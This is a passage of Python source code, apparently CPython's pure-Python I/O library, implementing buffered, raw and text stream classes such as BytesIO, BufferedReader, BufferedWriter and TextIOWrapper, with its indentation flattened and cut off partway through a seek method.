# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise UnsupportedOperation.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise UnsupportedOperation.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise UnsupportedOperation.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise an ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An IOError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, limit=-1):
r"""Read and return a line of bytes from the stream.
If limit is specified, at most limit bytes will be read.
Limit should be an int.
The line terminator is always b'\n' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if limit >= 0:
n = min(n, limit)
return n
else:
def nreadahead():
return 1
if limit is None:
limit = -1
elif not isinstance(limit, int):
raise TypeError("limit must be an integer")
res = bytearray()
while limit < 0 or len(res) < limit:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
self._checkClosed()
for line in lines:
self.write(line)
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
def read(self, n=-1):
"""Read and return up to n bytes, where n is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if n is None:
n = -1
if n < 0:
return self.readall()
b = bytearray(n.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read up to len(b) bytes into bytearray b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than len(b).
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, n=None):
"""Read and return up to n bytes, where n is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, n=None):
"""Read up to n bytes with at most one read() system call,
where n is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read up to len(b) bytes into bytearray b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
# XXX This ought to work with anything that supports the buffer API
data = self.read(len(b))
n = len(data)
try:
b[:n] = data
except TypeError as err:
import array
if not isinstance(b, array.array):
raise err
b[:n] = array.array('b', data)
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is never less than
len(b).
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise IOError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise IOError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush of closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
self.flush()
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
def readable(self):
return self.raw.readable()
def writable(self):
return self.raw.writable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError("can not serialize a '{0}' object"
.format(self.__class__.__name__))
def __repr__(self):
clsname = self.__class__.__name__
try:
name = self.name
except AttributeError:
return "<_pyio.{0}>".format(clsname)
else:
return "<_pyio.{0} name={1!r}>".format(clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
return memoryview(self._buffer)
def read(self, n=None):
if self.closed:
raise ValueError("read from closed file")
if n is None:
n = -1
if n < 0:
n = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + n)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, n):
"""This is the same as read.
"""
return self.read(n)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
n = len(b)
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("invalid whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos.__index__
except AttributeError as err:
raise TypeError("an integer is required") from err
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
return True
def writable(self):
return True
def seekable(self):
return True
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
A buffer for a readable, sequential BaseRawIO object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise IOError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, n=None):
"""Read n bytes.
Returns exactly n bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If n is negative, read until EOF or until read() would
block.
"""
if n is not None and n < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(n)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
try:
chunk = self.raw.read()
except IOError as e:
if e.errno != EINTR:
raise
continue
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
try:
chunk = self.raw.read(wanted)
except IOError as e:
if e.errno != EINTR:
raise
continue
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
# n is more then avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, n=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(n)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
while True:
try:
current = self.raw.read(to_read)
except IOError as e:
if e.errno != EINTR:
raise
continue
break
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, n):
"""Reads up to n bytes, with at most one read() system call."""
# Returns up to n bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if n < 0:
raise ValueError("number of bytes to read must be positive")
if n == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(n, len(self._read_buf) - self._read_pos))
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
_warning_stack_offset = 2
def __init__(self, raw,
buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
if not raw.writable():
raise IOError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
if max_buffer_size is not None:
warnings.warn("max_buffer_size is deprecated", DeprecationWarning,
self._warning_stack_offset)
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer
try:
self._flush_unlocked()
except BlockingIOError as e:
# We can't accept anything else.
# XXX Why not just let the exception pass through?
raise BlockingIOError(e.errno, e.strerror, 0)
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush of closed file")
written = 0
try:
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except IOError as e:
if e.errno != EINTR:
raise
continue
if n > len(self._write_buf) or n < 0:
raise IOError("write() returned incorrect number of bytes")
del self._write_buf[:n]
written += n
except BlockingIOError as e:
n = e.characters_written
del self._write_buf[:n]
written += n
raise BlockingIOError(e.errno, e.strerror, written)
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer,
buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
"""Constructor.
The arguments are two RawIO instances.
"""
if max_buffer_size is not None:
warnings.warn("max_buffer_size is deprecated", DeprecationWarning, 2)
if not reader.readable():
raise IOError('"reader" argument must be readable.')
if not writer.writable():
raise IOError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, n=None):
if n is None:
n = -1
return self.reader.read(n)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, n=0):
return self.reader.peek(n)
def read1(self, n):
return self.reader.read1(n)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
self.writer.close()
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
_warning_stack_offset = 3
def __init__(self, raw,
buffer_size=DEFAULT_BUFFER_SIZE, max_buffer_size=None):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size, max_buffer_size)
def seek(self, pos, whence=0):
if not (0 <= whence <= 2):
raise ValueError("invalid whence")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise IOError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, n=None):
if n is None:
n = -1
self.flush()
return BufferedReader.read(self, n)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, n=0):
self.flush()
return BufferedReader.peek(self, n)
def read1(self, n):
self.flush()
return BufferedReader.read1(self, n)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
class TextIOBase(IOBase):
"""Base class for text I/O.
This class provides a character and line based interface to stream
I/O. There is no readinto method because Python's character strings
are immutable. There is no public constructor.
"""
def read(self, n=-1):
"""Read at most n characters from stream, where n is an int.
Read from underlying buffer until we have n characters or we hit EOF.
If n is negative or omitted, read until EOF.
Returns a string.
"""
self._unsupported("read")
def write(self, s):
"""Write string s to stream and returning an int."""
self._unsupported("write")
def truncate(self, pos=None):
"""Truncate size to pos, where pos is an int."""
self._unsupported("truncate")
def readline(self):
"""Read until newline or EOF.
Returns an empty string if EOF is hit immediately.
"""
self._unsupported("readline")
def detach(self):
"""
Separate the underlying buffer from the TextIOBase and return it.
After the underlying buffer has been detached, the TextIO is in an
unusable state.
"""
self._unsupported("detach")
@property
def encoding(self):
"""Subclasses should override."""
return None
@property
def newlines(self):
"""Line endings translated so far.
Only line endings translated during reading are considered.
Subclasses should override.
"""
return None
@property
def errors(self):
"""Error setting of the decoder or encoder.
Subclasses should override."""
return None
io.TextIOBase.register(TextIOBase)
class IncrementalNewlineDecoder(codecs.IncrementalDecoder):
r"""Codec used when reading a file in universal newlines mode. It wraps
another incremental decoder, translating \r\n and \r into \n. It also
records the types of newlines encountered. When used with
translate=False, it ensures that the newline sequence is returned in
one piece.
"""
def __init__(self, decoder, translate, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors=errors)
self.translate = translate
self.decoder = decoder
self.seennl = 0
self.pendingcr = False
def decode(self, input, final=False):
# decode input (with the eventual \r from a previous pass)
if self.decoder is None:
output = input
else:
output = self.decoder.decode(input, final=final)
if self.pendingcr and (output or final):
output = "\r" + output
self.pendingcr = False
# retain last \r even when not translating data:
# then readline() is sure to get \r\n in one pass
if output.endswith("\r") and not final:
output = output[:-1]
self.pendingcr = True
# Record which newlines are read
crlf = output.count('\r\n')
cr = output.count('\r') - crlf
lf = output.count('\n') - crlf
self.seennl |= (lf and self._LF) | (cr and self._CR) \
| (crlf and self._CRLF)
if self.translate:
if crlf:
output = output.replace("\r\n", "\n")
if cr:
output = output.replace("\r", "\n")
return output
def getstate(self):
if self.decoder is None:
buf = b""
flag = 0
else:
buf, flag = self.decoder.getstate()
flag <<= 1
if self.pendingcr:
flag |= 1
return buf, flag
def setstate(self, state):
buf, flag = state
self.pendingcr = bool(flag & 1)
if self.decoder is not None:
self.decoder.setstate((buf, flag >> 1))
def reset(self):
self.seennl = 0
self.pendingcr = False
if self.decoder is not None:
self.decoder.reset()
_LF = 1
_CR = 2
_CRLF = 4
@property
def newlines(self):
return (None,
"\n",
"\r",
("\r", "\n"),
"\r\n",
("\n", "\r\n"),
("\r", "\r\n"),
("\r", "\n", "\r\n")
)[self.seennl]
class TextIOWrapper(TextIOBase):
r"""Character and line based layer over a BufferedIOBase object, buffer.
encoding gives the name of the encoding that the stream will be
decoded or encoded with. It defaults to locale.getpreferredencoding.
errors determines the strictness of encoding and decoding (see the
codecs.register) and defaults to "strict".
newline can be None, '', '\n', '\r', or '\r\n'. It controls the
handling of line endings. If it is None, universal newlines is
enabled. With this enabled, on input, the lines endings '\n', '\r',
or '\r\n' are translated to '\n' before being returned to the
caller. Conversely, on output, '\n' is translated to the system
default line seperator, os.linesep. If newline is any other of its
legal values, that newline becomes the newline when the file is read
and it is returned untranslated. On output, '\n' is converted to the
newline.
If line_buffering is True, a call to flush is implied when a call to
write contains a newline character.
"""
_CHUNK_SIZE = 2048
def __init__(self, buffer, encoding=None, errors=None, newline=None,
line_buffering=False, write_through=False):
if newline is not None and not isinstance(newline, str):
raise TypeError("illegal newline type: %r" % (type(newline),))
if newline not in (None, "", "\n", "\r", "\r\n"):
raise ValueError("illegal newline value: %r" % (newline,))
if encoding is None:
try:
encoding = os.device_encoding(buffer.fileno())
except (AttributeError, UnsupportedOperation):
pass
if encoding is None:
try:
import locale
except ImportError:
# Importing locale may fail if Python is being built
encoding = "ascii"
else:
encoding = locale.getpreferredencoding()
if not isinstance(encoding, str):
raise ValueError("invalid encoding: %r" % encoding)
if errors is None:
errors = "strict"
else:
if not isinstance(errors, str):
raise ValueError("invalid errors: %r" % errors)
self._buffer = buffer
self._line_buffering = line_buffering
self._encoding = encoding
self._errors = errors
self._readuniversal = not newline
self._readtranslate = newline is None
self._readnl = newline
self._writetranslate = newline != ''
self._writenl = newline or os.linesep
self._encoder = None
self._decoder = None
self._decoded_chars = '' # buffer for text returned from decoder
self._decoded_chars_used = 0 # offset into _decoded_chars for read()
self._snapshot = None # info for reconstructing decoder state
self._seekable = self._telling = self.buffer.seekable()
self._has_read1 = hasattr(self.buffer, 'read1')
if self._seekable and self.writable():
position = self.buffer.tell()
if position != 0:
try:
self._get_encoder().setstate(0)
except LookupError:
# Sometimes the encoder doesn't exist
pass
# self._snapshot is either None, or a tuple (dec_flags, next_input)
# where dec_flags is the second (integer) item of the decoder state
# and next_input is the chunk of input bytes that comes next after the
# snapshot point. We use this to reconstruct decoder states in tell().
# Naming convention:
# - "bytes_..." for integer variables that count input bytes
# - "chars_..." for integer variables that count decoded characters
def __repr__(self):
result = "<_pyio.TextIOWrapper"
try:
name = self.name
except AttributeError:
pass
else:
result += " name={0!r}".format(name)
try:
mode = self.mode
except AttributeError:
pass
else:
result += " mode={0!r}".format(mode)
return result + " encoding={0!r}>".format(self.encoding)
@property
def encoding(self):
return self._encoding
@property
def errors(self):
return self._errors
@property
def line_buffering(self):
return self._line_buffering
@property
def buffer(self):
return self._buffer
def seekable(self):
return self._seekable
def readable(self):
return self.buffer.readable()
def writable(self):
return self.buffer.writable()
def flush(self):
self.buffer.flush()
self._telling = self._seekable
def close(self):
if self.buffer is not None and not self.closed:
self.flush()
self.buffer.close()
@property
def closed(self):
return self.buffer.closed
@property
def name(self):
return self.buffer.name
def fileno(self):
return self.buffer.fileno()
def isatty(self):
return self.buffer.isatty()
def write(self, s):
'Write data, where s is a str'
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, str):
raise TypeError("can't write %s to text stream" %
s.__class__.__name__)
length = len(s)
haslf = (self._writetranslate or self._line_buffering) and "\n" in s
if haslf and self._writetranslate and self._writenl != "\n":
s = s.replace("\n", self._writenl)
encoder = self._encoder or self._get_encoder()
# XXX What if we were just reading?
b = encoder.encode(s)
self.buffer.write(b)
if self._line_buffering and (haslf or "\r" in s):
self.flush()
self._snapshot = None
if self._decoder:
self._decoder.reset()
return length
def _get_encoder(self):
make_encoder = codecs.getincrementalencoder(self._encoding)
self._encoder = make_encoder(self._errors)
return self._encoder
def _get_decoder(self):
make_decoder = codecs.getincrementaldecoder(self._encoding)
decoder = make_decoder(self._errors)
if self._readuniversal:
decoder = IncrementalNewlineDecoder(decoder, self._readtranslate)
self._decoder = decoder
return decoder
# The following three methods implement an ADT for _decoded_chars.
# Text returned from the decoder is buffered here until the client
# requests it by calling our read() or readline() method.
def _set_decoded_chars(self, chars):
"""Set the _decoded_chars buffer."""
self._decoded_chars = chars
self._decoded_chars_used = 0
def _get_decoded_chars(self, n=None):
"""Advance into the _decoded_chars buffer."""
offset = self._decoded_chars_used
if n is None:
chars = self._decoded_chars[offset:]
else:
chars = self._decoded_chars[offset:offset + n]
self._decoded_chars_used += len(chars)
return chars
def _rewind_decoded_chars(self, n):
"""Rewind the _decoded_chars buffer."""
if self._decoded_chars_used < n:
raise AssertionError("rewind decoded_chars out of bounds")
self._decoded_chars_used -= n
def _read_chunk(self):
"""
Read and decode the next chunk of data from the BufferedReader.
"""
# The return value is True unless EOF was reached. The decoded
# string is placed in self._decoded_chars (replacing its previous
# value). The entire input chunk is sent to the decoder, though
# some of it may remain buffered in the decoder, yet to be
# converted.
if self._decoder is None:
raise ValueError("no decoder")
if self._telling:
# To prepare for tell(), we need to snapshot a point in the
# file where the decoder's input buffer is empty.
dec_buffer, dec_flags = self._decoder.getstate()
# Given this, we know there was a valid snapshot point
# len(dec_buffer) bytes ago with decoder state (b'', dec_flags).
# Read a chunk, decode it, and put the result in self._decoded_chars.
if self._has_read1:
input_chunk = self.buffer.read1(self._CHUNK_SIZE)
else:
input_chunk = self.buffer.read(self._CHUNK_SIZE)
eof = not input_chunk
self._set_decoded_chars(self._decoder.decode(input_chunk, eof))
if self._telling:
# At the snapshot point, len(dec_buffer) bytes before the read,
# the next input to be decoded is dec_buffer + input_chunk.
self._snapshot = (dec_flags, dec_buffer + input_chunk)
return not eof
def _pack_cookie(self, position, dec_flags=0,
bytes_to_feed=0, need_eof=0, chars_to_skip=0):
# The meaning of a tell() cookie is: seek to position, set the
# decoder flags to dec_flags, read bytes_to_feed bytes, feed them
# into the decoder with need_eof as the EOF flag, then skip
# chars_to_skip characters of the decoded result. For most simple
# decoders, tell() will often just give a byte offset in the file.
return (position | (dec_flags<<64) | (bytes_to_feed<<128) |
(chars_to_skip<<192) | bool(need_eof)<<256)
def _unpack_cookie(self, bigint):
rest, position = divmod(bigint, 1<<64)
rest, dec_flags = divmod(rest, 1<<64)
rest, bytes_to_feed = divmod(rest, 1<<64)
need_eof, chars_to_skip = divmod(rest, 1<<64)
return position, dec_flags, bytes_to_feed, need_eof, chars_to_skip
def tell(self):
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if not self._telling:
raise IOError("telling position disabled by next() call")
self.flush()
position = self.buffer.tell()
decoder = self._decoder
if decoder is None or self._snapshot is None:
if self._decoded_chars:
# This should never happen.
raise AssertionError("pending decoded text")
return position
# Skip backward to the snapshot point (see _read_chunk).
dec_flags, next_input = self._snapshot
position -= len(next_input)
# How many decoded characters have been used up since the snapshot?
chars_to_skip = self._decoded_chars_used
if chars_to_skip == 0:
# We haven't moved from the snapshot point.
return self._pack_cookie(position, dec_flags)
# Starting from the snapshot position, we will walk the decoder
# forward until it gives us enough decoded characters.
saved_state = decoder.getstate()
try:
# Note our initial start point.
decoder.setstate((b'', dec_flags))
start_pos = position
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
need_eof = 0
# Feed the decoder one byte at a time. As we go, note the
# nearest "safe start point" before the current location
# (a point where the decoder has nothing buffered, so seek()
# can safely start from there and advance to this location).
next_byte = bytearray(1)
for next_byte[0] in next_input:
bytes_fed += 1
chars_decoded += len(decoder.decode(next_byte))
dec_buffer, dec_flags = decoder.getstate()
if not dec_buffer and chars_decoded <= chars_to_skip:
# Decoder buffer is empty, so this is a safe start point.
start_pos += bytes_fed
chars_to_skip -= chars_decoded
start_flags, bytes_fed, chars_decoded = dec_flags, 0, 0
if chars_decoded >= chars_to_skip:
break
else:
# We didn't get enough decoded data; signal EOF to get more.
chars_decoded += len(decoder.decode(b'', final=True))
need_eof = 1
if chars_decoded < chars_to_skip:
raise IOError("can't reconstruct logical file position")
# The returned cookie corresponds to the last safe start point.
return self._pack_cookie(
start_pos, start_flags, bytes_fed, need_eof, chars_to_skip)
finally:
decoder.setstate(saved_state)
def truncate(self, pos=None):
self.flush()
if pos is None:
pos = self.tell()
return self.buffer.truncate(pos)
def detach(self):
if self.buffer is None:
raise ValueError("buffer is already detached")
self.flush()
buffer = self._buffer
self._buffer = None
return buffer
def seek(self, cookie, whence=0):
if self.closed:
raise ValueError("tell on closed file")
if not self._seekable:
raise UnsupportedOperation("underlying stream is not seekable")
if whence == 1: # seek relative to current position
if cookie != 0:
raise UnsupportedOperation("can't do nonzero cur-relative seeks")
# Seeking to the current position should attempt to
# sync the underlying buffer with the current position.
whence = 0
cookie = self.tell()
if whence == 2: # seek relative to end of file
if cookie != 0:
raise UnsupportedOperation("can't do nonzero end-relative seeks")
self.flush()
position = self.buffer.seek(0, 2)
